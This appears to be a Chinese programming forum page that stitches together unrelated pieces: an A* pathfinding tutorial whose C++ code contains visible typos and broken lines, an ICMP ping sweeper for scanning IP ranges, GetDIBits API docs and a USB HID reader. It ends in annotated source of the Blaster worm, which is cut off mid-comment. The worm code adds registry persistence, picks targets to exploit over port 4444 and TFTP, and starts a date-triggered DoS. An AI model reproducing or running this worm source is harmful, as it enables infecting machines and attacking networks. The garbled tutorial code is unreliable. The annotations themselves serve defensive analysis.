欢迎访问栀子花论坛！

方向比努力重要！能力比知识重要！健康比财富重要！生活比文凭重要！EQ比IQ重要！

今天无意间注意到了baidu举办的程序设计大赛，其中去年的冠军就使用了

基于对Ａ＊算法的好奇加之自己也想好好学习下算法知识，于是找到了下面的好文章，拿来于大家分享．同时非常感谢原作者．

还有一个国外博士的网站要推荐下：http://theory.stanford.edu/~amitp/GameProgramming/

初识A*算法 

                                                  Sunway
　　 目 录
　　1 何谓启发式搜索算法
　　2 初识A*算法

　　写这篇文章的初衷是应一个网友的要求，当然我也发现现在有关人工智能的中文站点实在太少，我在这里抛砖引玉，希望大家都来热心的参与。还是说正题，我先拿A*算法开刀，是因为A*在游戏中有它很典型的用法，是人工智能在游戏中的代表。A*算法在人工智能中是一种典型的启发式搜索算法，为了说清楚A*算法，我看还是先说说何谓启发式算法。

1、何谓启发式搜索算法
　　在说它之前先提提状态空间搜索。状态空间搜索，如果按专业点的说法就是将问题求解过程表现为从初始状态到目标状态寻找这个路径的过程。通俗点说，就是在解一个问题时，找到一条解题的过程可以从求解的开始到问题的结果（好象并不通俗哦）。由于求解问题的过程中分枝有很多，主要是求解过程中求解条件的不确定性，不完备性造成的，使得求解的路径很多这就构成了一个图，我们说这个图就是状态空间。问题的求解实际上就是在这个图中找到一条路径可以从开始到结果。这个寻找的过程就是状态空间搜索。
　　常用的状态空间搜索有深度优先和广度优先。广度优先是从初始状态一层一层向下找，直到找到目标为止。深度优先是按照一定的顺序前查找完一个分支，再查找另一个分支，以至找到目标为止。这两种算法在数据结构书中都有描述，可以参看这些书得到更详细的解释。
　　前面说的广度和深度优先搜索有一个很大的缺陷就是他们都是在一个给定的状态空间中穷举。这在状态空间不大的情况下是很合适的算法，可是当状态空间十分大，且不预测的情况下就不可取了。他的效率实在太低，甚至不可完成。在这里就要用到启发式搜索了。
　　启发式搜索就是在状态空间中的搜索对每一个搜索的位置进行评估，得到最好的位置，再从这个位置进行搜索直到目标。这样可以省略大量无畏的搜索路径，提到了效率。在启发式搜索中，对位置的估价是十分重要的。采用了不同的估价可以有不同的效果。我们先看看估价是如何表示的。
　　启发中的估价是用估价函数表示的，如：

深入A*算法 

                                 -浅析A*算法在搜索最短路径中的应用

                                                  Sunway
　　目 录
　　1 A*算法的程序编写原理
　　2 用A*算法实现最短路径的搜索

　　在这里我将对A*算法的实际应用进行一定的探讨，并且举一个有关A*算法在最短路径搜索的例子。值得注意的是这里并不对A*的基本的概念作介绍，如果你还对A*算法不清楚的话，请看姊妹篇《初识A*算法》。
　　这里所举的例子是参考AMIT主页中的一个源程序，你可以在AMIT的站点上下载也可以在我的站点上下载。你使用这个源程序时，应该遵守一定的公约。

1、A*算法的程序编写原理
　　我在《初识A*算法》中说过，A*算法是最好优先算法的一种。只是有一些约束条件而已。我们先来看看最好优先算法是如何编写的吧。如图有如下的状态空间：（起始位置是A，目标位置是P，字母后的数字表示节点的估价值）。
　　如图有如下的状态空间：（起始位置是A，目标位置是P，字母后的数字表示节点的估价值）

图1 状态空间图

图2 节点图

　　先看搜索主函数：

　　void AstarPathfinder::FindPath(int sx, int sy, int dx, int dy)
　　{
　　　　NODE *Node, *BestNode;
　　　　int TileNumDest;

　　　　//得到目标位置，作判断用
　　　　TileNumDest = TileNum(sx, sy);

　　　　//生成Open和Closed表
　　　　OPEN=( NODE* )calloc(1,sizeof( NODE ));
　　　　CLOSED=( NODE* )calloc(1,sizeof( NODE ));

　　　　//生成起始节点，并放入Open表中
　　　　Node=( NODE* )calloc(1,sizeof( NODE ));
　　　　Node->g = 0;

　　　　//这是计算h值
　　　　Node->h = (dx-sx)*(dx-sx) + (dy-sy)*(dy-sy); // should really use sqrt().

　　　　//这是计算f值，即估价值
　　　　Node->f = Node->g+Node->h;
　　　　Node->NodeNum = TileNum(dx, dy);
　　　　Node->x = dx;
　　　　Node->y = dy;

　　　　OPEN->NextNode=Node; // make Open List point to first node
　　　　for (;;)
　　　　{
　　　　　　//从Open表中取得一个估价值最好的节点
　　　　　　BestNode=ReturnBestNode();

　　　　　　//如果该节点是目标节点就退出
　　　　　　if (BestNode->NodeNum == TileNumDest) // if we've found the end, break and finish
　　　　　　　　break;
　　　　　　//否则生成子节点
　　　　　　GenerateSuccessors(BestNode,sx,sy);
　　　　}
　　　　PATH = BestNode;
　　}

　　再看看生成子节点函数 GenerateSuccessors：

　　void AstarPathfinder::GenerateSuccessors(NODE *BestNode, int dx, int dy)
　　{
　　　　int x, y;

　　　　//依次生成八个方向的子节点，简单！
　　　　// Upper-Left
　　　　if ( FreeTile(x=BestNode->x-TILESIZE, y=BestNode->y-TILESIZE) )
　　　　　　GenerateSucc(BestNode,x,y,dx,dy);
　　　　// Upper
　　　　if ( FreeTile(x=BestNode->x, y=BestNode->y-TILESIZE) )
　　　　　　GenerateSucc(BestNode,x,y,dx,dy);
　　　　// Upper-Right
　　　　if ( FreeTile(x=BestNode->x+TILESIZE, y=BestNode->y-TILESIZE) )
　　　　　　GenerateSucc(BestNode,x,y,dx,dy);
　　　　// Right
　　　　if ( FreeTile(x=BestNode->x+TILESIZE, y=BestNode->y) )
　　　　　　GenerateSucc(BestNode,x,y,dx,dy);
　　　　// Lower-Right
　　　　if ( FreeTile(x=BestNode->x+TILESIZE, y=BestNode->y+TILESIZE) )
　　　　　　GenerateSucc(BestNode,x,y,dx,dy);
　　　　// Lower
　　　　if ( FreeTile(x=BestNode->x, y=BestNode->y+TILESIZE) )
　　　　　　GenerateSucc(BestNode,x,y,dx,dy);
　　　　// Lower-Left
　　　　if ( FreeTile(x=BestNode->x-TILESIZE, y=BestNode->y+TILESIZE) )
　　　　　　GeneraeSucc(BestNode,x,y,dx,dy);
　　　　// Left
　　　　if ( FreeTile(x=BestNode->x-TILESIZE, y=BestNode->y) )
　　　　　　GenerateSucc(BestNode,x,y,dx,dy);
　　}

　　看看最重要的函数GenerateSucc：

　　void AstarPathfinder::GenerateSucc(NODE *BestNode,int x, int y, int dx, int dy)
　　{
　　　　int g, TileNumS, c = 0;
　　　　NODE *Old, *Successor;

　　　　//计算子节点的 g 值
　　　　g = BestNode->g+1; // g(Successor)=g(BestNode)+cost of getting from BestNode to Successor
　　　　TileNumS = TileNum(x,y); // identification purposes

　　　　//子节点再Open表中吗？
　　　　if ( (Old=CheckOPEN(TileNumS)) != NULL ) // if equal to NULL then not in OPEN list,
　　　　　　　　　　　　　　　　　　　　　　　　 // else it returns the Node in Old
　　　　{
　　　　　　//若在
　　　　　　for( c = 0; c <8; c++)
　　　　　　　　if( BestNode->Child[c] == NULL ) // Add Old to the list of BestNode's Children
　　　　　　　　　　　　　　　　　　　　　　　　 // (or Successors).
　　　　　　　　　break;
　　　　　　　　BestNode->Child[c] = Old;
　　　　　　　　//比较Open表中的估价值和当前的估价值（只要比较g值就可以了）
　　　　　　　　if ( g g ) // if our new g value is Parent = BestNode;
　　　　　　　　　　Old->g = g;
　　　　　　　　　　Old->f = g + Old->h;
　　　　　　　　}
　　　　　　}
　　　　　　else //在Closed表中吗？
　　　　　　　　if ( (Old=CheckCLOSED(TileNumS)) != NULL ) // if equal to NULL then not in OPEN list
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 // else it returns the Node in Old
　　　　　　　　{
　　　　　　　　　　//若在
　　　　　　　　　　for( c = 0; c<8; c++)
　　　　　　　　　　　　if ( BestNode->Child[c] == NULL ) // Add Old to the list of BestNode's
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　// Children (or Successors). break;
　　　　　　　　　　　　BestNode->Child[c] = Old;
　　　　　　　　　　　　//比较Closed表中的估价值和当前的估价值（只要比较g值就可以了）
　　　　　　　　　　　　if ( g g ) // if our new g value is Parent = BestNode;
　　　　　　　　　　　　　　Old->g = g;
　　　　　　　　　　　　　　Old->f = g + Old->h; //再依次更新Old的所有子节点的估价值
　　　　　　　　　　　　　　PropagateDown(Old);　// Since we changed the g value of Old, we need
　　　　　　　　　　　　　　　　　　　　　　　　 // to propagate this new value downwards, i.e.
　　　　　　　　　　　　　　　　　　　　　　　　 // do a Depth-First traversal of the tree!
　　　　　　　　　　　　 }
　　　　　　　　}
　　　　　　　　else //不在Open表中也不在Close表中
　　　　　　　　{
　　　　　　　　　　//生成新的节点
　　　　　　　　　　Successor = ( NODE* )calloc(1,sizeof( NODE ));
　　　　　　　　　　Successor->Parent = BestNode;
　　　　　　　　　　Successor->g = g;
　　　　　　　　　　Successor->h = (x-dx)*(x-dx) + (y-dy)*(y-dy); // should do sqrt(), but since we
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 don't really
　　　　　　　　　　Successor->f = g+Successor->h; // care about the distance but just which branch
　　　　　　　　　　looks Successor->x = x; // better this should suffice. Anyayz it's faster.
　　　　　　　　　　Successor->y = y;
　　　　　　　　　　Successor->NodeNum = TileNumS;
　　　　　　　　　　//再插入Open表中，同时排序。
　　　　　　　　　　Insert(Successor); // Insert Successor on OPEN list wrt f
　　　　　　　　　　for( c =0; c <8; c++)
　　　　　　　　　　　 if ( BestNode->Child[c] == NULL ) // Add Old to the list of BestNode's
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　Children (or Successors).
　　　　　　　　　　　 break;
　　　　　　　　　　BestNode->Child[c] = Successor;
　　　　　　　　}
　　}

　　哈哈。A*算法我懂了。当然，我希望你有这样的感觉。不过我还要再说几句。仔细看看这个程序，你会发现，这个程序和我前面说的伪程序有一些不同，在GenerateSucc函数中，当子节点在Closed表中时，没有将子节点从Closed表中删除并放入Open表中。而是直接的重新的计算该节点的所有子节点的估价值（用PropagateDown函数）。这样可以快一些。另当子节点在Open表和Closed表中时，重新的计算估价值后，没有重新的对Open表中的节点排序，我有些想不通，为什么不排呢？会不会是一个小小的BUG。你知道告诉我好吗？
　　好了。主要的内容都讲完了，还是完整仔细的看看源程序吧。希望我所的对你有一点帮助，一点点也可以。如果你对文章中的观点有异议或有更好的解释都告诉我。

　　 下载本文的源程序（34KB）

大学生如何为加盟Google做准备

土匪在论坛说他要9秒才ping完500个ip,我觉得奇怪,于是说5秒足以。然后补充了一句：‘大牛1秒就够了’。于是他让我写一个看看。我就写了。估计目前1000ip也就是2秒吧。哈哈，我也成大牛了。
写的很乱，是拉vckbase的一个Xping修改的，就利用了一个线程技术。一共2个线程，一个发送，一个接收。代码没有整理纯粹是为了掩ping扫描的。中间有不少bug。需要用的小心。
点击下载全部代码 这里特别鸣谢玻璃提供的空间。

我知道的bug有：
1、可以接收到你没有ping的机器的信息。这个是因为我监听的时候没有区分是不是自己发送的。如果你需要，就自己添加好了。 ：P
2、我没有判断起始地址信息。也就说你的起始地址可以比结束地址大。不过没有效果。哈哈。暂时不算bug。
3、我还没有想到呢。
4、一个不好的地方，就是在线程中向窗体写东西。呵呵。01说要用消息才正规。不过我这里是演示。就不那么麻烦了 ：P
5、全局变量较多。很乱。
6、没有对ping进行封装。
7、命名不规范。
8、没有注释。 奇怪，我怎么忘了写注释了。
9、没有写谁写的。 哎，版权阿！555555    哈哈，其实我在开心的哭。为啥？因为如果让别人知道我写这么烂的代码，肯定那刀过来坎我。斑竹也会封我的id的。 ：P
10、不是吧，还想要，难道是批斗大会？

优点：
1、可以在5秒内扫描完500ip。满足了土匪的要求。 开心。 ：Ｄ
２、。。。。。。没有了。

对忘了贴核心代码了。哈哈。不知道能不能放到vckbase的代码库中。。。。做梦ing。
DWORD WINAPI CPing500IPDlg::ThreadPing(LPVOID lpParam )
{
    CPing500IPDlg* tmpThis = (CPing500IPDlg*)lpParam;

    struct sockaddr_in from;  

    char recv_buffer[512];
    int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);

    struct sockaddr_in local;
    local.sin_family=AF_INET;
    local.sin_addr.s_addr=INADDR_ANY; ///本机

    bind(sockfd,(struct sockaddr*)&local,sizeof local);

    int timeout = 1000;
    if (setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO , (char *) &timeout,
        sizeof(timeout)) == SOCKET_ERROR)
    {
        return false;
    }   
    while(1)
    {
        int fromlen = sizeof(from);
        memset(&from, 0, fromlen);
        memset(recv_buffer, 0, 512);   
        int iRecvSize = recvfrom(sockfd, recv_buffer, 512, 0,
            (struct sockaddr*)&from,  &fromlen);

        if(iRecvSize > 0)
        {
            CString tmp  = inet_ntoa(from.sin_addr);
            EnterCriticalSection(&critical_Section);        
            if(!gListIPFind(tmp))
            {
                gListIP.push_back(tmp);
                tmpThis->m_IPAddrList.InsertItem(0, tmp);
            }
            LeaveCriticalSection(&critical_Section);
        }   
        else if(iRecvSize == WSAETIMEDOUT)
        {
            tmpThis->MessageBox("ok了");
        }
    }
 
    closesocket(sockfd);
    return 0;
}

GetDIBits

The GetDIBits function retrieves the bits of the specified bitmap and copies them into a buffer using the specified format.

int GetDIBits(
  HDC hdc,           // handle to DC
  HBITMAP hbmp,      // handle to bitmap
  UINT uStartScan,   // first scan line to set
  UINT cScanLines,   // number of scan lines to copy
  LPVOID lpvBits,    // array for bitmap bits
  LPBITMAPINFO lpbi, // bitmap data buffer
  UINT uUsage        // RGB or palette index
);

Parameters

hdc

[in] Handle to the device context.

hbmp

[in] Handle to the bitmap.

uStartScan

[in] Specifies the first scan line to retrieve.

cScanLines

[in] Specifies the number of scan lines to retrieve.

lpvBits

[out] Pointer to a buffer to receive the bitmap data. If this parameter is NULL, the function passes the dimensions and format of the bitmap to the BITMAPINFO structure pointed to by the lpbi parameter.

lpbi

[in/out] Pointer to a BITMAPINFO structure that specifies the desired format for the DIB data.

uUsage

[in] Specifies the format of the bmiColors member of the BITMAPINFO structure. It must be one of the following values.

Value	Meaning
DIB_PAL_COLORS	The color table should consist of an array of 16-bit indexes into the current logical palette.
DIB_RGB_COLORS	The color table should consist of literal red, green, blue (RGB) values.

Return Values

If the lpvBits parameter is non-NULL and the function succeeds, the return value is the number of scan lines copied from the bitmap.

Windows 95/98: If the lpvBits parameter is NULL and GetDIBits successfully fills the BITMAPINFO structure, the return value is the total number of scan lines in the bitmap.

Windows NT/ 2000: If the lpvBits parameter is NULL and GetDIBits successfully fills the BITMAPINFO structure, the return value is non-zero.

If the function fails, the return value is zero.

Windows NT/ 2000: To get extended error information, call GetLastError. This can be the following value.

Remarks

If the requested format for the DIB matches its internal format, the RGB values for the bitmap are copied. If the requested format doesn't match the internal format, a color table is synthesized. The following table describes the color table synthesized for each format.

If the lpvBits parameter is a valid pointer, the first six members of the BITMAPINFOHEADER structure must be initialized to specify the size and format of the DIB. The scan lines must be aligned on a DWORD except for RLE compressed bitmaps.

A bottom-up DIB is specified by setting the height to a positive number, while a top-down DIB is specified by setting the height to a negative number. The bitmap's color table will be appended to the BITMAPINFO structure.

If lpvBits is NULL, GetDIBits examines the first member of the first structure pointed to by lpbi. This member must specify the size, in bytes, of a BITMAPCOREHEADER or a BITMAPINFOHEADER structure. The function uses the specified size to determine how the remaining members should be initialized.

If lpvBits is NULL and the bit count member of BITMAPINFO is initialized to zero, GetDIBits fills in a BITMAPINFOHEADER structure or BITMAPCOREHEADER without the color table. This technique can be used to query bitmap attributes.

The bitmap identified by the hbmp parameter must not be selected into a device context when the application calls this function.

The origin for a bottom-up DIB is the lower-left corner of the bitmap; the origin for a top-down DIB is the upper-left corner.

Requirements

  Windows NT/2000: Requires Windows NT 3.1 or later.
  Windows 95/98: Requires Windows 95 or later.
  Header: Declared in Wingdi.h; include Windows.h.

//可以查看按游戏手柄按钮时的情况.

//USB接口的游戏手柄

//编译环境:Windows 2000 server+VC++ 6.0+Win2K DDK

#include <stdio.h>
#include <windows.h>
#include <setupapi.h>
#include <tchar.h>
extern "C"
{
#include <hidsdi.h>
}

void main()
{
 GUID HidGuid;

 // 查找本系统中HID类的GUID标识
 HidD_GetHidGuid(&HidGuid);
 _tprintf("系统中HID类的GUID标识为:%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x\n",
   HidGuid.Data1,HidGuid.Data2 ,HidGuid.Data3 ,
   HidGuid.Data4[0],HidGuid.Data4[1],HidGuid.Data4[2],
   HidGuid.Data4[3],HidGuid.Data4[4],HidGuid.Data4[5],
   HidGuid.Data4[6],HidGuid.Data4[7]);
 
 // 准备查找符合HID规范的USB设备
 HDEVINFO hDevInfo = SetupDiGetClassDevs(&HidGuid,
           NULL,
           NULL,
           DIGCF_PRESENT | DIGCF_DEVICEINTERFACE);
 if (hDevInfo == INVALID_HANDLE_VALUE)
 {
  _tprintf("符合HID规范的USB设备发生错误\n");
  return;
 }

 _tprintf("正在查找可用的USB设备...\n");

 DWORD MemberIndex = 0;
 SP_DEVICE_INTERFACE_DATA DeviceInterfaceData;
 BOOL bSuccess = FALSE;

 DeviceInterfaceData.cbSize = sizeof(SP_DEVICE_INTERFACE_DATA);
 do
 {
  bSuccess = SetupDiEnumDeviceInterfaces(hDevInfo,
             NULL,
            &nsp;&HidGuid,
             MemberIndex,
             &DeviceInterfaceData);
  if ((!bSuccess) && (GetLastError() == ERROR_NO_MORE_ITEMS))
  {
   if(MemberIndex == 0)
    _tprintf("抱歉,未找到可用的USB设备!\n");
   else
    _tprintf("没有更多的可用的USB设备!\n");

   SetupDiDestroyDeviceInfoList(hDevInfo);
   return;
  }
  _tprintf("找到了一个USB设备:\n");
  //若找到了一个USB设备,则获取该设备的细节信息
  PSP_DEVICE_INTERFACE_DETAIL_DATA pDeviceInterfaceDetailData;
  DWORD Length = 0;
  
  SetupDiGetDeviceInterfaceDetail(hDevInfo,
          &DeviceInterfaceData,
          NULL,
          0,
          &Length,
          NULL);
  pDeviceInterfaceDetailData = (PSP_DEVICE_INTERFACE_DETAIL_DATA)malloc(Length);
  pDeviceInterfaceDetailData->cbSize = sizeof(SP_DEVICE_INTERFACE_DETAIL_DATA);  //MUST BE!!!

  if (!SetupDiGetDeviceInterfaceDetail(hDevInfo,
          &DeviceInterfaceData,
          pDeviceInterfaceDetailData,
          Length,
          NULL,
          NULL))
   _tprintf("查找路径设备时出错!\n");
  else
   _tprintf("设备路径:%s\n",pDeviceInterfaceDetailData->DevicePath );
  
  //打开设备句柄
  HANDLE hDeviceHandle = CreateFile(pDeviceInterfaceDetailData->DevicePath ,
            GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            NULL,
            OPEN_EXISTING,
            0,
            NULL);
  if (hDeviceHandle == INVALID_HANDLE_VALUE)
   _tprintf("打开设备路径出错!\n");
  else
  {
   HIDD_ATTRIBUTES Attributes;
   HidD_GetAttributes(hDeviceHandle,&Attributes);
   //将有关该设备的标识显示出来
   _tprintf("供应商ID\t:0X%04X\n",Attributes.VendorID);
   _tprintf("产品ID\t:0X%04X\n",Attributes.ProductID);
   _tprintf("产品版本号:0X%04X\n",Attributes.VersionNumber);
   
   WCHAR mString[256];
   TCHAR Buffer[256];

   HidD_GetManufacturerString(hDeviceHandle,mString,sizeof(mString));
   if (wcstombs(Buffer,mString,256) == -1)  // fail
    Buffer[0] = NULL;
   _tprintf("生产商:\t%s\n",Buffer);
   
   HidD_GetProductString(hDeviceHandle,mString,sizeof(mString));
   if (wcstombs(Buffer,mString,256) == -1)
    Buffer[0] = NULL;
   _tprintf("产品名称:\t%s\n",Buffer);

   // 通信:
   PHIDP_PREPARSED_DATA pHidpPreparsedData;
   HIDP_CAPS    hidPCaps;
   if (!HidD_GetPreparsedData(hDeviceHandle,&pHidpPreparsedData))
   {
    _tprintf("获取 HID PREPARED DATA 失败!\n");
    return;
   }
   NTSTATUS status = HidP_GetCaps(pHidpPreparsedData,&hidPCaps);
   if (status == HIDP_STATUS_SUCCESS)
   {
    _tprintf("CAP信息如下:\n");
    _tprintf("     InputReportByteLength %d\n", hidPCaps.InputReportByteLength);
    _tprintf("     OutputReportByteLength %d\n", hidPCaps.OutputReportByteLength);
   }
   DWORD nReadBytes = 0;
   BYTE *pInputReport = new BYTE[hidPCaps.InputReportByteLength];
   memset(pInputReport,0,hidPCaps.InputReportByteLength);
   
   do
   {
    ReadFile(hDeviceHandle,pInputReport,hidPCaps.InputReportByteLength,&nReadBytes,NULL);
    if (hidPCaps.InputReportByteLength == nReadBytes)
    {
     for(unsigned int i=0; i<(nReadBytes-1);i++)
      _tprintf("%02x-",pInputReport[i]);
     _tprintf("%02x\r",pInputReport[nReadBytes-1]);
    }
    if (pInputReport[nReadBytes-2] == 0x20)  //break the loop when pressing a specific key
    {
     _tprintf("\n");
     break;
    }
    Sleep(10);
   }while(hidPCaps.InputReportByteLength == nReadBytes);

   //释放句柄资源
   CloseHandle(hDeviceHandle);
  }
    
  MemberIndex++;
 }while(bSuccess);

 SetupDiDestroyDeviceInfoList(hDevInfo);
}

Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=15608

Blaster
Worm for Windows
blaster.cpp
--------------------------------------------------------------------------------

#include <winsock2.h>
#include <ws2tcpip.h> /*IP_HDRINCL*/
#include <wininet.h> /*InternetGetConnectedState*/
#include <stdio.h>

#pragma comment (lib, "ws2_32.lib")
#pragma comment (lib, "wininet.lib")
#pragma comment (lib, "advapi32.lib")


/*
* These strings aren't used in the worm, Buford put them here
* so that whitehat researchers would discover them.
* BUFORD: Note that both of these messages are the typical
* behavior of a teenager who recently discovered love, and
* is in the normal teenage mode of challenging authority.
*/
const char msg1[]="I just want to say LOVE YOU SAN!!";
const char msg2[]="billy gates why do you make this possible ?"
" Stop making money and fix your software!!";


/*
* Buford probably put the worm name as a "define" at the top
* of his program so that he could change the name at any time.
* 2003-09-29: This is the string that Parson changed.
*/
#define MSBLAST_EXE "msblast.exe"

/*
* MS-RPC/DCOM runs over port 135.
* DEFENSE: firewalling port 135 will prevent systems from
* being exploited and will hinder the spread of this worm.
*/
#define MSRCP_PORT_135 135

/*
* The TFTP protocol is defined to run on port 69. Once this
* worm breaks into a victim, it will command it to download
* the worm via TFTP. Therefore, the worms briefly runs a
* TFTP service to deliver that file.
* DEFENSE: firewalling 69/udp will prevent the worm from
* fully infected a host.
*/
#define TFTP_PORT_69 69

/*
* The shell-prompt is established over port 4444. The
* exploit code (in the variable 'sc') commands the victim
* to "bind a shell" on this port. The exploit then connects
* to that port to send commands, such as TFTPing the
* msblast.exe file down and launching it.
* DEFENSE: firewalling 4444/tcp will prevent the worm from
* spreading.
*/
#define SHELL_PORT_4444 4444


/*
* A simple string to hold the current IP address
*/
char target_ip_string[16];

/*
* A global variable to hold the socket for the TFTP service.
*/
int fd_tftp_service;

/*
* Global flag to indicate this thread is running. This
* is set when the thread starts, then is cleared when
* This demonstrates that Buford isn't confident with
* multi-threaded programming -- he should just check
* the thread handle.
*/
int is_tftp_running;

/*
* When delivering the worm file to the victim, it gets the
* name by querying itself using GetModuleFilename(). This
* makes it easier to change the filename or to launch the
* worm. */
char msblast_filename[256+4];

int ClassD, ClassC, ClassB, ClassA;

int local_class_a, local_class_b;

int winxp1_or_win2k2;


ULONG WINAPI blaster_DoS_thread(LPVOID);
void blaster_spreader();
void blaster_exploit_target(int fd, const char *victim_ip);
void blaster_send_syn_packet(int target_ip, int fd);


/***************************************************************
* This is where the 'msblast.exe' program starts running
***************************************************************/
void main(int argc, char *argv[])
{
WSADATA WSAData;
char myhostname[512];
char daystring[3];
char monthstring[3];
HKEY hKey;
int ThreadId;
register unsigned long scan_local=0;

/*
* Create a registry key that will cause this worm
* to run every time the system restarts.
* DEFENSE: Slammer was "memory-resident" and could
* be cleaned by simply rebooting the machine.
* Cleaning this worm requires this registry entry
* to be deleted.
*/
RegCreateKeyEx(
/*hKey*/ HKEY_LOCAL_MACHINE,
/*lpSubKey*/ "SOFTWARE\\Microsoft\\Windows\\"
"CurrentVersion\\Run",
/*Reserved*/ 0,
/*lpClass*/ NULL,
/*dwOptions*/ REG_OPTION_NON_VOLATILE,
/*samDesired */ KEY_ALL_ACCESS,
/*lpSecurityAttributes*/ NULL,
/*phkResult */ &hKey,
/*lpdwDisposition */ 0);
RegSetvalueExA(
hKey,
"windows auto update",
0,
REG_SZ,
MSBLAST_EXE,
50);
RegCloseKey(hKey);


/*
* Make sure this isn't a second infection. A common problem
* with worms is that they sometimes re-infect the same
* victim repeatedly, eventually crashing it. A crashed
* system cannot spread the worm. Therefore, worm writers
* now make sure to prevent reinfections. The way Blaster
* does this is by creating a system "global" object called
* "BILLY". If another program in the computer has already
* created "BILLY", then this instance won't run.
* DEFENSE: this implies that you can remove Blaster by
* creating a mutex named "BILLY". When the computer
* restarts, Blaster will falsely believe that it has
* already infected the system and will quit.
*/
CreateMutexA(NULL, TRUE, "BILLY");
if (GetLastError() == ERROR_ALREADY_EXISTS)
ExitProcess(0);

/*
* Windows systems requires "WinSock" (the network API layer)
* to be initialized. Note that the SYNflood attack requires
* raw sockets to be initialized, which only works in
* version 2.2 of WinSock.
* BUFORD: The following initialization is needlessly
* complicated, and is typical of programmers who are unsure
* of their knowledge of sockets..
*/
if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0
&& WSAStartup(MAKEWORD(1,1), &WSAData) != 0
&& WSAStartup(1, &WSAData) != 0)
return;

/*
* The worm needs to read itself from the disk when
* transferring to the victim. Rather than using a hard-coded
* location, it discovered the location of itself dynamically
* through this function call. This has the side effect of
* making it easier to change the name of the worm, as well
* as making it easier to launch it.
*/
GetModuleFileNameA(NULL, msblast_filename,
sizeof(msblast_filename));

/*
* When the worm infects a dialup machine, every time the user
* restarts their machine, the worm's network communication
* will cause annoying 'dial' popups for the user. This will
* make them suspect their machine is infected.
* The function call below makes sure that the worm only
* starts running once the connection to the Internet
* has been established and not before.
* BUFORD: I think Buford tested out his code on a machine
* and discovered this problem. Even though much of the
* code indicates he didn't spend much time on
* testing his worm, this line indicates that he did
* at least a little bit of testing.
*/
while (!InternetGetConnectedState(&ThreadId, 0))
Sleep (20000); /*wait 20 seconds and try again */

/*
* Initialize the low-order byte of target IP address to 0.
*/
ClassD = 0;

/*
* The worm must make decisions "randomly": each worm must
* choose different systems to infect. In order to make
* random choices, the programmer must "seed" the random
* number generator. The typical way to do this is by
* seeding it with the current timestamp.
* BUFORD: Later in this code you'll find that Buford calls
* 'srand()' many times to reseed. This is largely
* unnecessary, and again indicates that Buford is not
* confident in his programming skills, so he constantly
* reseeds the generator in order to make extra sure he
* has gotten it right.
*/
srand(GetTickCount());

/*
* This initializes the "local" network to some random
* value. The code below will attempt to figure out what
* the true local network is -- but just in case it fails,
* the initialization fails, using random values makes sure
* the worm won't do something stupid, such as scan the
* network around 0.0.0.0
*/
local_class_a = (rand() % 254)+1;
local_class_b = (rand() % 254)+1;

/*
* This discovers the local IP address used currently by this
* victim machine. Blaster randomly chooses to either infect
* just the local ClassB network, or some other network,
* therefore it needs to know the local network.
* BUFORD: The worm writer uses a complex way to print out
* the IP address into a string, then parse it back again
* to a number. This demonstrates that Buford is fairly
* new to C programming: he thinks in terms of the printed
* representation of the IP address rather than in its
* binary form.
*/
if (gethostname(myhostname, sizeof(myhostname)) != -1) {
HOSTENT *p_hostent = gethostbyname(myhostname);

if (p_hostent != NULL && p_hostent->h_addr != NULL) {
struct in_addr in;
const char *p_addr_item;

memcpy(&in, p_hostent->h_addr, sizeof(in));
sprintf(myhostname, "%s", inet_ntoa(in));

p_addr_item = strtok(myhostname, ".");
ClassA = atoi(p_addr_item);

p_addr_item = strtok(0, ".");
ClassB = atoi(p_addr_item);

p_addr_item = strtok(0, ".");
ClassC = atoi(p_addr_item);

if (ClassC > 20) {
/* When starting from victim's address range,
* try to start a little bit behind. This is
* important because the scanning logic only
* move forward. */
srand(GetTickCount());
ClassC -= (rand() % 20);
}
local_class_a = ClassA;
local_class_b = ClassB;
scan_local = TRUE;
}
}


/*
* This chooses whether Blaster will scan just the local
* network (40% chance) or a random network (60% chance)
*/
srand(GetTickCount());
if ((rand() % 20) < 12)
scan_local = FALSE;

/*
* The known exploits require the hacker to indicate whether
* the victim is WinXP or Win2k. The worm has to guess. The
* way it guesses is that it chooses randomly. 80% of the time
* it will assume that all victims are WnXP, and 20% of the
* time it will assume all victims are Win2k. This means that
* propogation among Win2k machines will be slowed down by
* the fact Win2k machines are getting DoSed faster than they
* are getting exploited.
*/
winxp1_or_win2k2 = 1;
if ((rand()%10) > 7)
winxp1_or_win2k2 = 2;

/*
* If not scanning locally, then choose a random IP address
* to start with.
* BUG: this worm choose bad ranges above 224. This will
* cause a bunch of unnecessary multicast traffic. Weird
* multicast traffic has historically been an easy way of
* detecting worm activity.
*/
if (!scan_local) {
ClassA = (rand() % 254)+1;
ClassB = (rand() % 254);
ClassC = (rand() % 254);
}


/*
* Check the date so that when in the certain range, it will
* trigger a DoS attack against Micosoft. The following
* times will trigger the DoS attack:
* Aug 16 through Aug 31
* Spt 16 through Spt 30
* Oct 16 through Oct 31
* Nov 16 through Nov 30
* Dec 16 through Dec 31
* This applies to all years, and is based on local time.
* FAQ: The worm is based on "local", not "global" time.
* That means the DoS attack will start from Japan,
* then Asia, then Europe, then the United States as the
* time moves across the globe.
*/
#define MYLANG MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT)
#define LOCALE_409 MAKELCID(MYLANG, SORT_DEFAULT)
GetDateformat( LOCALE_409,
0,
NULL, /*localtime, not GMT*/
"d",
daystring,
sizeof(daystring));
GetDateformat( LOCALE_409,
0,
NULL, /*localtime, not GMT*/
"M",
monthstring,
sizeof(monthstring));
if (atoi(daystring) > 15 && atoi(monthstring) > 8)
CreateThread(NULL, 0,
blaster_DoS_thread,
0, 0, &ThreadId);

/*
* As the final task of the program, go into worm mode
* trying to infect systems.
*/
for (;;)
blaster_spreader();

/*
* It'll never reach this point, but in theory, you need a
* WSACleanup() after a WSAStartup().
*/
WSACleanup();
}



/*
* This will be called from CreateThread in the main worm body
* right after it connects to port 4444. After the thread is
* started, it then sends the string "
